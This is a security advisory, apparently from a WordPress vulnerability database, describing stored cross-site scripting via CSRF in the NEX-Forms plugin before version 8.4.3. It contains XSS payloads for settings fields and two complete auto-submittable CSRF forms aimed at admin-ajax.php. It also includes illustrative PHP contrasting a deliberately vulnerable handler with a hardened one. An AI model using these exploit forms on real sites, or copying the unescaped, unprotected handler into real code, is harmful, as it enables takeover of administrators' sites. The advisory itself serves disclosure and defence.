NEX-Forms < 8.4.3 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not have CSRF checks in place when editing a form, and does not escape some of its settings, as well as form fields, before outputting them in attributes. This could allow attackers to make a logged-in admin edit arbitrary forms with Cross-Site Scripting payloads in them.
Proof of Concept
Fixed in 7.9.4:

In Global Setting > Preferences > Validation, put the following payload in the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings:

    "><script>alert(/XSS/)</script>

In Global Setting > Preferences > Emails > Email Autoresponder (User emails) > Subject setting:

    "><script>alert(/XSS/)</script>

The XSS will be triggered when viewing the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard).

Fixed in 7.9.7 (data validated client side only):

    <html>
      <body>
        <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
          <input type="hidden" name="action" value="nf_update_record" />
          <input type="hidden" name="table" value="wap_nex_forms" />
          <input type="hidden" name="edit_Id" value="1" />
          <input type="hidden" name="plugin" value="shared" />
          <input type="hidden" name="title" value="Test" />
          <input type="hidden" name="form_fields" value='"><script>alert(/XSS-form_fields/)</script>' />
          <input type="hidden" name="clean_html" value="" />
          <input type="hidden" name="is_form" value="1" />
          <input type="hidden" name="is_template" value="0" />
          <input type="hidden" name="post_type" value="POST" />
          <input type="hidden" name="post_action" value="ajax" />
          <input type="hidden" name="custom_url" value="" />
          <input type="hidden" name="mail_to" value="admin@localhost.org" />
          <input type="hidden" name="from_address" value="admin@localhost.org" />
          <input type="hidden" name="from_name" value="WP" />
          <input type="submit" value="Submit"/>
        </form>
      </body>
    </html>

Fixed in 8.4.3. Change edit_Id to an existing form's ID:

    <html>
      <body>
        <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
          <input type="hidden" name="action" value="nf_update_record" />
          <input type="hidden" name="table" value="wap_nex_forms" />
          <input type="hidden" name="edit_Id" value="1" />
          <input type="hidden" name="plugin" value="shared" />
          <input type="hidden" name="title" value="Test" />
          <input type="hidden" name="form_fields[xss]" value='"><script>alert(/XSS-form_fields/)</script>' />
          <input type="hidden" name="clean_html" value="" />
          <input type="hidden" name="is_form" value="1" />
          <input type="hidden" name="is_template" value="0" />
          <input type="hidden" name="post_type" value="POST" />
          <input type="hidden" name="post_action" value="ajax" />
          <input type="hidden" name="custom_url" value="" />
          <input type="hidden" name="mail_to" value="admin@localhost.org" />
          <input type="hidden" name="from_address" value="admin@localhost.org" />
          <input type="hidden" name="from_name" value="WP" />
          <input type="submit" value="Submit"/>
        </form>
      </body>
    </html>
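The description names two separate defects: the admin-ajax.php record-update request carries no CSRF protection, and stored settings are written into HTML attributes without escaping. The advisory also notes that the 7.9.7 fix validated data client side only, which a cross-site form submission bypasses entirely. The following is hypothetical WordPress plugin code written for this page to illustrate the mitigation pattern; it is not NEX-Forms' own code, and the AJAX action name, option key, nonce action and request field names are assumed. The weak handler is shown beside a hardened one that verifies a nonce and a capability on the server, sanitises on the way in and escapes for the attribute context on the way out.

```php
<?php
// Hypothetical plugin code written for this page (not NEX-Forms' own code).
// Assumed names: AJAX action 'np_update_record', option 'np_validation_messages',
// nonce action 'np_update_record_nonce', request fields 'edit_Id' and 'required_msg'.

// --- Weak pattern: any POST reaching admin-ajax.php from a logged-in user is trusted ---
// A logged-in admin whose browser submits a third-party form to this endpoint changes the
// stored value (CSRF), and that value is later echoed raw into an attribute (stored XSS).
function np_weak_update_record() {
    $messages             = get_option( 'np_validation_messages', array() );
    $messages['required'] = $_POST['required_msg']; // no nonce, no capability check, no sanitising
    update_option( 'np_validation_messages', $messages );
    wp_send_json_success();
}

function np_weak_render_field_attr() {
    $messages = get_option( 'np_validation_messages', array() );
    // Raw interpolation: a value such as "><script>...</script> closes the attribute and tag.
    echo '<input type="text" data-required-msg="' . $messages['required'] . '">';
}

// --- Hardened pattern ---
function np_update_record() {
    // 1. CSRF: the request must carry a nonce issued to this user for this action.
    //    check_ajax_referer() terminates the request when the nonce is missing or invalid.
    check_ajax_referer( 'np_update_record_nonce', 'security' );

    // 2. Authorisation: a nonce proves intent, not privilege; check the capability too.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Validate and sanitise input on the server, independent of any client-side checks.
    $edit_id  = isset( $_POST['edit_Id'] ) ? absint( $_POST['edit_Id'] ) : 0;
    $required = isset( $_POST['required_msg'] )
        ? sanitize_text_field( wp_unslash( $_POST['required_msg'] ) )
        : '';
    if ( 0 === $edit_id ) {
        wp_send_json_error( 'invalid form id', 400 );
    }

    $messages             = get_option( 'np_validation_messages', array() );
    $messages['required'] = $required;
    update_option( 'np_validation_messages', $messages );
    wp_send_json_success( array( 'edit_Id' => $edit_id ) );
}
// Registered for authenticated users only (wp_ajax_), never wp_ajax_nopriv_.
add_action( 'wp_ajax_np_update_record', 'np_update_record' );

// 4. Escape for the output context (an attribute here) regardless of earlier sanitising,
//    so a value that was stored before the fix still cannot break out of the attribute.
function np_render_field_attr() {
    $messages = get_option( 'np_validation_messages', array() );
    $required = isset( $messages['required'] ) ? $messages['required'] : '';
    echo '<input type="text" data-required-msg="' . esc_attr( $required ) . '">';
}

// The settings page emits the nonce that the plugin's JavaScript sends back as 'security'.
function np_settings_page_nonce() {
    wp_nonce_field( 'np_update_record_nonce', 'security' );
}
```

The order of the checks matters: the nonce check runs first so that a cross-site submission fails before any state is touched, and the capability check runs regardless of the nonce because a valid nonce from a low-privileged account must not be enough to edit global settings. Escaping on output with esc_attr() is kept even though input is sanitised, since the two defend different boundaries.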
Classification
Type: XSS
Miscellaneous
Original Researcher: Shivam Rai
Submitter: Shivam Rai
Verified: Yes
Timeline
Publicly Published: 2021-11-15
Added: 2021-11-15
Last Updated: 2023-05-18